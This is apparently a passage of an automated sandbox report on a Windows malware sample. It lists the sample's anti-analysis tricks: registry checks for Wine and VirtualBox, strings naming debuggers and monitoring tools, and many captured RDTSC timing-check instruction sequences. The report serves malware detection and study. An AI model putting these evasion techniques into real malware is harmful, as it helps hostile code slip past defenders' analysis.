Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: 8wiUGtm9UM.exe	Binary or memory string: SBIEDLL.DLL
Source: 8wiUGtm9UM.exe, 00000000.00000003.2134557962.0000000005530000.00000004.00001000.00020000.00000000.sdmp, 8wiUGtm9UM.exe, 00000000.00000002.2175067355.0000000000532000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SBIEDLL.DLLN@
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 8wiUGtm9UM.exe, 00000000.00000002.2178981326.000000000734F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2381403262.000000000078B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D82627 second address: D82645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FA7911D2C95h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D82645 second address: D8264B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D828DD second address: D828E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D828E1 second address: D828E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D828E9 second address: D828ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D82BE3 second address: D82BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D82BEB second address: D82C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA7911D2C98h 0x0000000e jp 00007FA7911D2C86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D82C12 second address: D82C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D82C16 second address: D82C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D84E4C second address: D84E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D84E50 second address: D84E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D84F0B second address: D84F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA790B33256h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D84F15 second address: D84F5F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA7911D2C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f jbe 00007FA7911D2C86h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 jmp 00007FA7911D2C8Fh 0x00000026 mov eax, dword ptr [eax] 0x00000028 jnp 00007FA7911D2C8Ah 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 pushad 0x00000033 pushad 0x00000034 ja 00007FA7911D2C86h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D84F5F second address: D84FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop eax 0x0000000b movzx esi, si 0x0000000e push 00000003h 0x00000010 sub di, 9CD7h 0x00000015 push 00000000h 0x00000017 mov edx, dword ptr [ebp+122D3389h] 0x0000001d push 00000003h 0x0000001f add dword ptr [ebp+124491B4h], esi 0x00000025 push A5163E00h 0x0000002a pushad 0x0000002b push esi 0x0000002c jmp 00007FA790B33260h 0x00000031 pop esi 0x00000032 pushad 0x00000033 jmp 00007FA790B3325Ch 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b popad 0x0000003c add dword ptr [esp], 1AE9C200h 0x00000043 mov di, cx 0x00000046 lea ebx, dword ptr [ebp+1244AD79h] 0x0000004c call 00007FA790B33266h 0x00000051 mov dword ptr [ebp+122D3327h], eax 0x00000057 pop edi 0x00000058 xchg eax, ebx 0x00000059 jmp 00007FA790B33265h 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 pop esi 0x00000064 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D8504F second address: D85053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D85053 second address: D85079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov edx, edi 0x0000000a mov dword ptr [ebp+122D2DFFh], edx 0x00000010 push 00000000h 0x00000012 mov ecx, edx 0x00000014 call 00007FA790B33259h 0x00000019 jc 00007FA790B33264h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D85079 second address: D85098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA7911D2C86h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA7911D2C91h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D85098 second address: D850B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B3325Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D850B4 second address: D850B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D850B8 second address: D850BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D850BC second address: D85144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 je 00007FA7911D2C9Ah 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 jmp 00007FA7911D2C8Ah 0x00000019 pop ecx 0x0000001a pop eax 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FA7911D2C88h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 xor edx, dword ptr [ebp+122D2E8Eh] 0x0000003b push 00000003h 0x0000003d jmp 00007FA7911D2C8Eh 0x00000042 push 00000000h 0x00000044 mov edi, dword ptr [ebp+122D37BCh] 0x0000004a push 00000003h 0x0000004c mov edx, ecx 0x0000004e call 00007FA7911D2C89h 0x00000053 push eax 0x00000054 push esi 0x00000055 pushad 0x00000056 popad 0x00000057 pop esi 0x00000058 pop eax 0x00000059 push eax 0x0000005a push edi 0x0000005b push edi 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D85144 second address: D85169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA790B33267h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D85169 second address: D8517A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D8517A second address: D851B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FA790B3325Ch 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FA790B3325Eh 0x00000018 pop eax 0x00000019 mov dword ptr [ebp+122D1BEFh], edi 0x0000001f lea ebx, dword ptr [ebp+1244AD82h] 0x00000025 movzx edi, dx 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D852E0 second address: D852EA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA7911D2C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D852EA second address: D85329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA790B33264h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007FA790B3325Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA790B3325Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D85329 second address: D8534A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA7911D2C96h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D8534A second address: D8536B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B33264h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D8536B second address: D8541E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FA7911D2C98h 0x0000000c popad 0x0000000d pop eax 0x0000000e call 00007FA7911D2C8Ch 0x00000013 mov dword ptr [ebp+122D30F8h], edx 0x00000019 pop edx 0x0000001a push 00000003h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FA7911D2C88h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 jmp 00007FA7911D2C8Bh 0x0000003b push 00000000h 0x0000003d push 00000003h 0x0000003f call 00007FA7911D2C8Ah 0x00000044 pop edi 0x00000045 call 00007FA7911D2C89h 0x0000004a jp 00007FA7911D2C9Fh 0x00000050 push eax 0x00000051 jmp 00007FA7911D2C8Eh 0x00000056 mov eax, dword ptr [esp+04h] 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D8541E second address: D85422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D85422 second address: D85428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D977F2 second address: D977F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D977F7 second address: D97808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA7911D2C8Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4404 second address: DA442F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FA790B33256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FA790B33269h 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA45C3 second address: DA45C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA45C9 second address: DA45CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA48CA second address: DA48CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA48CE second address: DA48D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA48D8 second address: DA48F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FA7911D2C8Bh 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4A45 second address: DA4A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B33267h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA790B33264h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4A77 second address: DA4AAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C97h 0x00000007 jmp 00007FA7911D2C91h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 jns 00007FA7911D2C86h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4AAD second address: DA4AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4AB1 second address: DA4AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA7911D2C86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4AC1 second address: DA4AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4D9A second address: DA4DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA7911D2C86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4DA4 second address: DA4DB0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jl 00007FA790B33256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4DB0 second address: DA4DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4DD1 second address: DA4DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FA790B3325Eh 0x0000000a push edx 0x0000000b jmp 00007FA790B33268h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4F8B second address: DA4F94 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA4F94 second address: DA4F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA5573 second address: DA5577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA56CD second address: DA56D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: D9C883 second address: D9C887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA58A5 second address: DA58C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B33267h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA58C6 second address: DA58CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA5EE5 second address: DA5EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FA790B3325Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA616A second address: DA618D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jnl 00007FA7911D2C86h 0x0000000b pop edx 0x0000000c jmp 00007FA7911D2C93h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA618D second address: DA6191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA6191 second address: DA6197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA9D96 second address: DA9DEE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA790B33258h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c jg 00007FA790B3325Ch 0x00000012 pop edi 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jp 00007FA790B33260h 0x0000001d mov eax, dword ptr [eax] 0x0000001f push esi 0x00000020 jmp 00007FA790B33269h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DA9F3F second address: DA9F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA7911D2C8Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DAB10B second address: DAB128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA790B33269h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB119C second address: DB11A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB11A2 second address: DB11A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB11A7 second address: DB11CC instructions: 0x00000000 rdtsc 0x00000002 je 00007FA7911D2C9Bh 0x00000008 jmp 00007FA7911D2C93h 0x0000000d push edx 0x0000000e pop edx 0x0000000f jl 00007FA7911D2C8Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB15AD second address: DB15B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB15B3 second address: DB15CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA7911D2C96h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8wiUGtm9UM.exe	RDTSC instruction interceptor: First address: DB15CD second address: DB15DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
